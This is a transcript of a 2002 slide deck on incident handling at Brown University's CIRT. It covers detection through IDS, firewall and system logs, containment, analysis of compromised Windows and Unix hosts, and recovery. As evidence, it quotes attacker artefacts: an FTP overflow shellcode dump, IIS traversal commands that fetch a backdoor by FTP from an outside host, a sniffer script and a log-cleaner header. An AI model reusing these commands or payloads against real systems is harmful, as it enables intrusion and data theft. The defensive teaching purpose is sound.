Adventures in incident handling
Download
1 / 58

Adventures In Incident Handling - PowerPoint PPT Presentation


  • 108 Views
  • Uploaded on

Adventures In Incident Handling. Paul Asadoorian, GCIA Brown University August 16, 2002 MIT Security Camp. Outline. Incident Handling @ Brown University Incident Discovery Processes Containing the damage Analyzing the results Recovery Learning from the experiences.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' Adventures In Incident Handling' - olivia-rivas


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Adventures in incident handling

Adventures In Incident Handling

Paul Asadoorian, GCIA

Brown University

August 16, 2002

MIT Security Camp


Outline
Outline

  • Incident Handling @ Brown University

  • Incident Discovery Processes

  • Containing the damage

  • Analyzing the results

  • Recovery

  • Learning from the experiences

Paul Asadoorian, Brown University CIRT


The brown university cirt
The Brown University CIRT

  • CIRT (Computer Incident Response Team)

  • Formed in Mid-December 2001

  • Consists of members of technical teams and management within the computing and information services department

Paul Asadoorian, Brown University CIRT


The brown university cirt1
The Brown University CIRT

  • Identify categories of malicious activity threatening Brown University's computing and information services.

  • Coordinate appropriate responses to counter malicious threats

  • Codify group level response procedures so that there is archival documentation and understanding of roles across CIS groups

Paul Asadoorian, Brown University CIRT


The brown university cirt2
The Brown University CIRT

  • Review and recommend appropriate new policy or updates to existing policies to CIS management

  • Be aware of developing security issues affecting computing and information services

  • Work with the Help Desk and Computer Education to raise user's awareness of computing best practices and security issues

Paul Asadoorian, Brown University CIRT


The brown university cirt3
The Brown University CIRT

  • Respond to Incidents using the six step process:

    • Preparation

    • Identification

    • Containment

    • Eradication

    • Recovery

    • Lessons Learned

  • Primary Incident Handlers:

    • Paul Asadoorian

    • Suzanne Coski

Paul Asadoorian, Brown University CIRT


Cirt authorization
CIRT - Authorization

  • Get permission

  • Security Assessment and Audit Authorization:

    • “When requested, any access required for the purpose of performing an audit or responding to a computer security incident will be provided to members of Brown University's Information Security team. “

  • Also permits use of “legitimate” security auditing tools

Paul Asadoorian, Brown University CIRT


Cirt remedy form
CIRT – Remedy Form

Paul Asadoorian, Brown University CIRT


Cirt remedy form1
CIRT – Remedy Form

Paul Asadoorian, Brown University CIRT


Cirt jump bag
CIRT – Jump Bag

  • Laptop with appropriate software

  • Networking hub and cables

  • Cell phone

  • Campus phone directory

  • Linux/windows boot disks

  • Operating System CD’s

  • Tape/Disk/CDRW backup media

Paul Asadoorian, Brown University CIRT


Local contacts
Local Contacts

  • Strengthened Brown’s Systems Administrators group

  • Monthly meetings and newsletters

  • Email: SysAdmins@brown.edu

  • Web:http://www.brown.edu/Research/SysAdmins/

Paul Asadoorian, Brown University CIRT


Contacting cirt
Contacting CIRT

  • Email:

    CIRT@brown.edu

  • Web:

    http://www.brown.edu/Facilities/CIS/CIRT/

Paul Asadoorian, Brown University CIRT


Incident discovery
Incident Discovery

  • Intrusion Detection System

  • Logs (Firewall, Systems, Routers)

  • 3rd Party

  • Panicking Systems Administrators

Paul Asadoorian, Brown University CIRT


Incident discovery ids
Incident Discovery: IDS

  • Currently monitoring all incoming and outgoing Internet and Internet2 traffic

  • Spikes up to 300mb/s

  • Does not catch attacks that occur on campus only

Paul Asadoorian, Brown University CIRT


Incident discovery ids1
Incident Discovery: IDS

  • Snort (www.snort.org)

  • TopLayer Networks IDS Load Balancer (www.toplayer.com)

  • MySQL, ACID, Apache, SSH

    • SSH for rule management

Paul Asadoorian, Brown University CIRT


Incident discovery ids2
Incident Discovery: IDS

Paul Asadoorian, Brown University CIRT


Incident discovery ids3
Incident Discovery: IDS

#(1 - 2420) [2002-07-02 11:52:25] [arachNIDS/287] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow

IPv4: 203.184.173.249 -> MY.SUB.NET.8 hlen=5 TOS=48 dlen=350 ID=7510 flags=0 offset=0 TTL=46 chksum=8390

TCP: port=36269 -> dport: 21 flags=***AP*** seq=2161363806 ack=3044544837 off=5 res=0 win=5840 urp=0 chksum=65114 Payload: length = 301

000 : 50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........

010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

030 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

040 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

050 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

060 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

070 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

080 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

090 : 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 ....1.1.1..F..1.

0a0 : 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E 31 C0 31 1.C..A.?...k^1.1

0b0 : C9 8D 5E 01 88 46 04 66 B9 B0 27 CD 80 31 C0 8D ..^..F.f..'..1..

0c0 : 5E 01 B0 3D CD 80 31 C0 31 DB 8D 5E 08 89 43 02 ^..=..1.1..^..C.

0d0 : 31 C9 FE C9 31 C0 8D 5E 08 B0 0C CD 80 FE C9 75 1...1..^.......u

0e0 : F3 31 C0 88 46 09 8D 5E 08 B0 3D CD 80 FE 0E B0 .1..F..^..=.....

0f0 : 30 FE C8 88 46 04 31 C0 88 46 07 89 76 08 89 46 0...F.1..F..v..F

100 : 0C 89 F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 ....N..V.....1.1

110 : DB B0 01 CD 80 E8 90 30 62 69 6E 30 73 68 31 2E .......0bin0sh1.

120 : 2E 31 31 40 61 6F 6C 2E 63 6F 6D 0D 0A .11@aol.com..


Incident discovery ids4
Incident Discovery: IDS

#(5 - 51010) [2002-07-22 14:23:36] ATTACK RESPONSES id check returned

Root

IPv4: MY.SUB.NET.126 -> 202.100.254.163

hlen=5 TOS=0 dlen=76 ID=53672 flags=0 offset=0 TTL=63 chksum=58344

TCP: port=22 -> dport: 1060 flags=***AP*** seq=306540118 ack=513337267

off=8 res=0 win=31856 urp=0 chksum=64269

Options:

#1 - NOP len=0

#2 - NOP len=0

#3 - TS len=10 data=074F58920054721D

Payload: length = 24

000 : 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid=

010 : 30 28 72 6F 6F 74 29 0A 0(root).

Paul Asadoorian, Brown University CIRT


Incident discovery ids5
Incident Discovery: IDS

Jul 22 15:17:08 mtsnow snort: [1:1326:1] EXPLOIT ssh

CRC32 overflow NOOP [Classification: Executable code was

detected] [Priority: 1]: {TCP} 202.100.254.163:1040 ->

MY.SUB.NET.126:22

<Repeats 9 more times>

Jul 22 14:23:36 crestedb snort: [1:498:2] ATTACK

RESPONSES id check returned root [Classification: Potentially

Bad Traffic] [Priority: 2]: {TCP} MY.SUB.NET.126:22 ->

202.100.254.163:1060

Paul Asadoorian, Brown University CIRT


Incident discovery firewall logs
Incident Discovery: Firewall Logs

  • Firewall protects our critical infrastructure

  • Isolated Subnet with no machines

  • Simply logs any traffic going to this subnet

    • Approx 90,000 packets logged per month

Paul Asadoorian, Brown University CIRT


Incident discovery firewall logs1
Incident Discovery: Firewall Logs

Paul Asadoorian, Brown University CIRT


Incident discovery firewall logs2
Incident Discovery: Firewall Logs

Jul 24 00:14:57 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:13" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Jul 24 00:14:59 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:16" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Aug 5 09:01:38 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:41" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Aug 5 09:01:40 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:44" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Paul Asadoorian, Brown University CIRT


Incident discovery system logs
Incident Discovery: System Logs

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0,

[100]USER, user1,,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 204, 0, 0, 530, 1326,

[100]PASS, -, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0,

[101]USER, user1,,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 141, 0, 0, 530, 1326,

[101]PASS, -, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 15, 0, 0, 331, 0,

[100]USER, user1, -,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326,

[100]PASS, -, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0,

[101]USER, user1,-,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0,

[102]USER, user1, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0,

[103]USER, user1, -,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326,

[101]PASS, -, -,

Paul Asadoorian, Brown University CIRT


Incident discovery system logs1
Incident Discovery: System Logs

3/6/02 6:14:45 PM Security Failure Audit Logon/Logoff 539

NT AUTHORITY\SYSTEM <System Name>

Logon Failure:

Reason: Account locked out

User Name: ftptest

Domain: WIN07147

Logon Type: 3

Logon Process: KSecDD

Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0

Workstation Name: \\WIN07147

Paul Asadoorian, Brown University CIRT


Incident discovery system logs2
Incident Discovery: System Logs

2002-03-24 21:13:08 204.141.115.253 - MY.SUB.NET.233 80

GET /scripts/..%5c../winnt/system32/cmd.exe

/c+copy+c:\winnt\system32\cmd.exe+c:\command.exe 502

2002-03-24 21:13:11 204.141.115.253 - MY.SUB.NET.233 80

GET /scripts/..%5c../command.exe

/c+echo+nltestsite>>c:\config.txt 502

2002-03-24 21:13:13 204.141.115.253 - MY.SUB.NET.233 80

GET/scripts/..%5c../command.exe

/c+echo+nolimit>>c:\config.txt 502

2002-03-24 21:13:18 204.141.115.253 - MY.SUB.NET.233 80

GET /scripts/..%5c../command.exe

/c+echo+get%20/secret/ServUDaemon.ini%20c:\test.ini>>c:\co

nfig.txt 502

Paul Asadoorian, Brown University CIRT


Adventures in incident handling

copy c:\winnt\system32\cmd.exe c:\command.exe

Echo nltestsite>>c:\config.txt

Echo nolimit>>c:\config.txt

Echo get /secret/ServUDaemon.ini c:\test.ini>>c:\config.txt

Echo get /secret/dirchange.tx c:\dirchange.txt>>c:\config.txt

Echo binary>>c:\config.txt

Echo get /secret/ServUDaemon.exe c:\test.exe>>c:\config.txt

Echo bye>>c:\config.txt

ftp.exe -s:c:\config.txt nltestsite.hypermart.net

Mkdir c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501

Copy c:\test.exe c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe

Copy c:\test.ini c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\WINNT.dll

Copy c:\dirchange.txt c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\system32.dll

del+c:\test.ini

del+c:\test.exe

del+c:\config.txt

dir+c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501

del+c:\config.txt

del+c:\config.txt

c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe c:\RECYCLER\S-1-5-21

1065036112-524770614-4547331-501\WINNT.dll

Paul Asadoorian, Brown University CIRT


Incident discovery router logs
Incident Discovery: Router Logs

Jul 30 17:49:19 router.mydomain.edu 10124: Jul 30 16:49:18: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 193.0.0.11 (0/0), 2 packets

Jul 30 18:51:22 router.mydomain.edu 10173: Jul 30 17:51:21: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 1 packet

Jul 30 18:52:37 router.mydomain.edu 10176: Jul 30 17:52:36: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 1 packet

Jul 30 18:55:32 router.mydomain.edu 10179: Jul 30 17:55:31: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 128.8.7.4 (0/0), 1 packet

Jul 30 18:57:21 router.mydomain.edu 10181: Jul 30 17:57:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 5 packets

Jul 30 18:58:21 router.mydomain.edu 10182: Jul 30 17:58:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 2 packets

Paul Asadoorian, Brown University CIRT


Incident discovery 3 rd party
Incident Discovery: 3rd party

You are receiving this notice since your address is listed as the contact in

the ARIN database for IP address MY.SUB.NET.79.The following Nimda Worm intrusion attempt was made against SOMEONEELSESDOMAIN.COM.DATE/TIME: Aug-13-2002 (05:52:00) [UTC]SOURCE   : MY.SUB.NET.79DEST     : 172.213.167.32ATTEMPT  : /scripts/root.exe?/c+dirPlease advise your user that their system has been compromised and is being actively utilized as an attack launchpoint against other systems.Thank you for your prompt attention to this matter.-Early Bird v2.6 (http://www.treachery.net/earlybird/)

Paul Asadoorian, Brown University CIRT


Incident discovery panicking systems administrator
Incident Discovery: Panicking Systems Administrator

  • I “Think” I’ve been hacked

  • I’ve been hacked, help!

  • I was hacked, didn’t I tell you?

Paul Asadoorian, Brown University CIRT


Adventures in incident handling

.,gg,. .,gg,. `$$$$$. .$$$$$' `$$$$$. .$$$$$' .,g%d$"^"$b%y,. .,g%d$"^"$b%y,..,g%d$"^"$b%y,. `$$$$$. .$$$$$'g$$$$' `$$$$y..g$$$$' .g$$$$' `""' $$$$$$$$$$$$.l$$$$: :$$$$ll$$$$: johnny l$$$$: g%d$$b%y,. .$$$$$'""`$$$$$.$$$$$p g$$$$$'l$$$$: seven l$$$$: l$$$$: .$$$$$' `$$$$$.`^"$b%y,.,g%d~"^' `"--"' `^"$b%y,.,g%d~"^' .$$$$$' `$$$$$. `""""' `""""' you can stop one, but you can NOT stop all of us! -------### Powered By X-ORG ###------- -------### ###------- -------### ToRn, Danny-Boy, Apache ###------- -------### Dimfate, Angelz, Annihilat ###------- -------### JNX, _random, Beast ###------- -------### W_Knight, Markland ###------- -------### |mojo69| ###-------Dear System Admin,Your system was recently compromised by X-ORG.. We patched the security hole used to compromise your system, Please note, no data on your system was stolen or damaged in any shape of form, nor was this ever our intention. We simply installed some backdoors to permit us to access to the system again.If you would like to contact us regarding any security issues or even simply for a chat, please email..XORG@mailroom.com or you can find us on #etcpub @ IRCnet.X-Organisation."IN THE NAME OF BEXTER!" - EOF -X-Org SunOS Rootkit v2.5DXE - By JudgeD/Danny-Boy

Paul Asadoorian, Brown University CIRT


Containing the damage
Containing the damage

  • Filter from the network on local router

  • Prefer port disabling on switch

  • Tracking and clean-up

    • Hey I got a new address and I can’t get to the Internet?

Paul Asadoorian, Brown University CIRT


Analyzing the results windows
Analyzing the results: Windows

bash-2.05# nmap -p1-65535 MY.SUB.NET.144

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )

Interesting ports on host.domain.myuniv.edu (MY.SUB.NET.144):

(The 65529 ports scanned but not shown below are in state: closed)

Port State Service

135/tcp open loc-srv

139/tcp open netbios-ssn

1029/tcp open ms-lsa

1031/tcp open iad2

6129/tcp open unknown

7614/tcp open unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 31 seconds

Paul Asadoorian, Brown University CIRT


Analyzing the results windows1
Analyzing the results: Windows

  • Connect to ports and see what’s interesting:

    bash-2.05# nc MY.SUB.NET.144 7614

    "Wollf Remote Manager" v1.4

    Code by wollf, http://www.xfocus.org

    [500105@C:\WINNT\system32]#

Paul Asadoorian, Brown University CIRT


Analyzing the results windows2
Analyzing the Results: Windows

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )

Interesting ports on host.mydomain.edu (MY.SUB.NET.84):

(The 65528 ports scanned but not shown below are in state: closed)

Port State Service

113/tcp open auth

135/tcp open loc-srv

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1027/tcp open IIS

1517/tcp open vpac

57970/tcp open unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 65 seconds

Paul Asadoorian, Brown University CIRT


Analyzing the results windows3
Analyzing the Results: Windows

bash-2.05# nc MY.SUB.NET.84 57970

220-Serv-U FTP Server v3.0 for WinSock ready...

220-

220--Server Stats

220-Uptime: 5 days 15 hours 4 mins

220-Files downloaded: 76 Total: 952044 Kb

220-Files uploaded: 326 Total: 7621646 Kb

220-Current Speed: 0.000 Kb/sec

220-Average Speed: 17.632 Kb/sec

220-

220--User Stats

220-Users logged in: 1 / -1

220-Total logged in users: 61

220-Users in last 24hrs: 7

220-

220-################################

Paul Asadoorian, Brown University CIRT


Analyzing the results windows4
Analyzing the Results: Windows

  • What we find:

    • LSASS.exe

    • ispc.exe

    • system32.dll

    • SERVICES.EXE

    • nc.exe

    • xdcc

  • ServUStartUpLog.txt

  • servudaemon.ini

  • xdcc.bat

  • Slave.exe

  • srvany.exe

Paul Asadoorian, Brown University CIRT


Analyzing the results windows5
Analyzing the Results: Windows

  • ServU-FTP Server

  • IROffer – IRC BOT to distribute files

  • Fire Daemon – Run any program as a service

Paul Asadoorian, Brown University CIRT


Analyzing the results windows6
Analyzing the Results: Windows

  • Hiding in the trash:

    @echo off

    c:

    cd\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\xdcc

    iroffer.exe my.config

Paul Asadoorian, Brown University CIRT


Analyzing the results windows7
Analyzing the Results: Windows

  • Movies

  • Video Games

  • Software

  • Adult Material

Paul Asadoorian, Brown University CIRT


Analyzing the results windows8
Analyzing the Results: Windows

  • How They get in:

    • NetBIOS Null Sessions

    • Blank or weak Administrator passwords

    • Unpatched IIS Servers

Paul Asadoorian, Brown University CIRT


Analyzing the results unix
Analyzing the Results: Unix

Jun 16 16:51:27 moab snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.244:1332 -> 195.210.91.83:1

Jun 16 16:51:27 tsali snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.23:1702 -> 195.210.91.83:4

Jun 16 12:08:42 mtsnow snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.54:1853 -> 195.210.91.83:3

Jun 16 12:18:25 vail snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.75:1639 -> 195.210.91.83:10113

Jun 16 16:51:27 durango snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.68:1893 -> 195.210.91.83:5

Paul Asadoorian, Brown University CIRT


Analyzing the results unix1
Analyzing the Results: Unix

#(1 - 260297) [2002-06-25 01:51:43] [arachNIDS/05] SCAN nmap fingerprint attempt

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814

#(2 - 251812) [2002-06-25 00:46:39] [arachNIDS/28] SCAN nmap TCP

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36455 -> dport: 7 flags=***A**** seq=1927116476

#(2 - 251813) [2002-06-25 00:47:07] [arachNIDS/05] SCAN nmap fingerprint attempt

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814

#(3 - 259687) [2002-06-25 06:23:10] [arachNIDS/28] SCAN nmap TCP

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36457 -> dport: 1 flags=***A**** seq=1927116476

Paul Asadoorian, Brown University CIRT


Analyzing the results unix2
Analyzing the Results: Unix

#(5 - 254473) [2002-06-25 04:26:55] [Bugtraq/2347] [CVE/CVE-2001-0144] EXPLOIT ssh CRC32 overflow /bin/sh

IPv4: 62.211.128.72 -> MY.SUB.NET.55

hlen=5 TOS=48 dlen=473 ID=58947 flags=0 offset=0 TTL=46 chksum=43204

TCP: port=1527 -> dport: 22 flags=***AP*** seq=1074100681

ack=3278036958 off=8 res=0 win=16060 urp=0 chksum=62278

Options:

#1 - NOP len=0

#2 - NOP len=0

#3 - TS len=10 data=02AD419900648C52

Payload: length = 421

Paul Asadoorian, Brown University CIRT


Analyzing the results unix3
Analyzing the Results: Unix

#(3 - 260901) [2002-06-25 18:35:41] ATTACK RESPONSES id check returned root^M

IPv4: 206.252.192.195 -> MY.SUB.NET.55

hlen=5 TOS=0 dlen=1500 ID=64118 flags=0 offset=0 TTL=53 chksum=47327^M

TCP: port=6667 -> dport: 32885 flags=***A**** seq=3486885204^M

ack=1549233503 off=5 res=0 win=8610 urp=0 chksum=45928^M

Payload: length = 1460^M

<snip>

510 : 6E 65 74 20 4B 6F 62 65 7C 65 73 5A 7C 20 48 40 net Kobe|esZ| H@^M

520 : 20 3A 30 20 75 69 64 3D 30 28 72 6F 6F 74 29 20 :0 uid=0(root) ^M

530 : 67 69 64 3D 30 28 72 6F 6F 74 29 0D 0A 3A 69 72 gid=0(root)..:ir^M

540 : 63 2D 31 2E 73 74 65 61 6C 74 68 2E 6E 65 74 20 c-1.stealth.net ^M

550 : 33 35 32 20 4D 6F 6E 69 6E 6F 20 23 69 67 6E 6F 352 Monino #igno^M

560 : 74 6F 20 7E 69 72 63 6E 65 74 20 32 31 33 2D 31 to ~ircnet 213-1^M

570 : 34 30 2D 31 32 2D 32 31 38 2E 66 61 73 74 72 65 40-12-218.fastre^M

580 : 73 2E 6E 65 74 20 2A 2E 65 64 69 73 6F 6E 74 65 s.net *.edisonte^M

<snip>

Paul Asadoorian, Brown University CIRT


Analyzing the results unix4
Analyzing the Results: Unix

bash-2.05# nmap -sS -p1-65535 MY.SUB.NET.55

Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap/ )

Interesting ports on marcia.geo.brown.edu (MY.SUB.NET.55):

(The 65491 ports scanned but not shown below are in state: closed)

Port State Service

<Snip>

22/tcp open ssh

23/tcp open telnet

25/tcp open smtp

<Snip>

8888/tcp open sun-answerbook

9010/tcp open unknown

22273/tcp open wnn6

25000/tcp open unknown

32771/tcp open sometimes-rpc5

<Snip>

Paul Asadoorian, Brown University CIRT


Analyzing the results unix5
Analyzing the Results: Unix

bash-2.05#telnet MY.SUB.NET.55 25000

Trying MY.SUB.NET.55...

Connected to MY.SUB.NET.55.

Escape character is '^]'.

SSH-1.5-1.2.25

^]

Paul Asadoorian, Brown University CIRT


Analyzing the results unix6
Analyzing the Results: Unix

  • /dev/pts/01

    • Rootkit

  • /dev/prom

    • Sn.l

    • dos

  • /usr/lib

    • Ldlibnet.so

    • Lpstart

    • Lpset

Paul Asadoorian, Brown University CIRT


Analyzing the results unix7
Analyzing the Results: Unix

Lpstart:

set EMAIL_ADDRESS angelz1578@usa.net

touch /dev/prom/sn.l

#cat /dev/prom/sn.l|mail ${EMAIL_ADDRESS} >/dev/null

echo "Restart on `date`" >>/dev/prom/sn.l

if test -f /dev/prom/dos ;then

cd /usr/lib

./lpq

fi

nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l

>/dev/null &

Paul Asadoorian, Brown University CIRT


Analyzing the results unix8
Analyzing the Results: Unix

Contents of /dev/prom/sn.l:

-- TCP/IP LOG -- TM: Tue Jun 25 06:31:17 --

PATH: 163.178.101.249(ftp) => marcia(ftp)

STAT: Tue Jun 25 06:31:17, 2 pkts, 0 bytes [TH_RST]

DATA:

--

-- TCP/IP LOG -- TM: Tue Jun 25 08:16:38 --

PATH: roc-24-24-47-93.rochester.rr.com(ftp) => marcia(ftp)

STAT: Tue Jun 25 08:16:39, 2 pkts, 0 bytes [TH_RST]

DATA:

--

Paul Asadoorian, Brown University CIRT


Analyzing the results unix9
Analyzing the Results: Unix

-- TCP/IP LOG -- TM: Tue Jun 25 05:54:50 --

PATH: hackedsystem(32873) => hacker.ftpsite.com(ftp)

STAT: Tue Jun 25 05:55:50, 33 pkts, 232 bytes [TH_FIN]

: DATA: USER reiregna

: PASS assamalaka

: CWD images

: PORT MY,SUB,NET,55,128,106

: RETR sunpsy.tgz

: PORT MY,SUB,NET,55,128,107

: NLST -al

: PORT MY,SUB,NET,55,128,108

: RETR sun.tgz

: TYPE I

: PORT MY,SUB,NET,55,128,109

: RETR sunpsy.tgz

: QUIT

Paul Asadoorian, Brown University CIRT


Analyzing the results unix10
Analyzing the Results: Unix

  • Looks like lpset is a sniffer:

    # strings lpset

    rlogin

    telnet

    smtp

    -- TCP/IP LOG -- TM: %s --

    PATH: %s(%s) =>

    %s(%s)

    STAT: %s, %d pkts, %d bytes [%s]

    DATA:

Paul Asadoorian, Brown University CIRT


Analyzing the results unix11
Analyzing the Results: Unix

  • Looks like Lpq is a DoS tool:

    %d.%d.%d.%d

    Usage: %s <dst> <src> <size> <number>

    dst: Destination Address

    src: Source Address

    size: Size of packet which should be no larger than

    1024 should allow for xtra header info thru routes

    num: packets

Paul Asadoorian, Brown University CIRT


Analyzing the results unix12
Analyzing the Results: Unix

  • Its running SSH on port 25000 as well:

    #more sshd_config

    <snip>

    Port 25000

    ListenAddress 0.0.0.0

    <snip>

Paul Asadoorian, Brown University CIRT


Adventures in incident handling

Analyzing the Results: Unix

  • Log Cleaner too:

    #!/bin/sh

    #

    # Generic log cleaner v0.4 By: Tragedy/Dor (dor@kaapeli.net) Based

    # on sauber..

    #

    # This is TOTALLY incomplete... I never added support for IRIX or

    # SunOS...And.. i most likely never will.. And i take no responsibility for

    # any use/misuse of this tool..

    #

    # Notes-0.3

    # SunOS support added.. had to rewrite most of it :P

    # Notes-0.4

    # Beta IRIX support added and enabled...

Paul Asadoorian, Brown University CIRT


Analyzing the results unix13
Analyzing the Results: Unix

  • Headlines read:

    “Italian police arrest 14 in hacker probe “

    http://news.com.com/2100-1001-948179.html

  • Coordinate with local authorities:

    • Secret Service contact

    • Especially where loses occur

Paul Asadoorian, Brown University CIRT


Recovery
Recovery

  • 99% of the time format and re-install or restore from tape

  • Have good backups

  • Does not come back on the network until its clean

  • Change all passwords

Paul Asadoorian, Brown University CIRT


Lessons learned
Lessons Learned

  • The CIRT Report

    • What happened?

    • How did it happen?

    • Was data lost or stolen?

    • How can we prevent this?

    • What can CIRT do better?

Paul Asadoorian, Brown University CIRT


Contact info
Contact Info

  • Paul_Asadoorian@brown.edu

  • Sharing Snort Rules – Securely

  • CIRT – http://www.brown.edu/Facilities/CIS/CIRT/

  • SysAdmins – http://www.brown.edu/Research/SysAdmins/

Paul Asadoorian, Brown University CIRT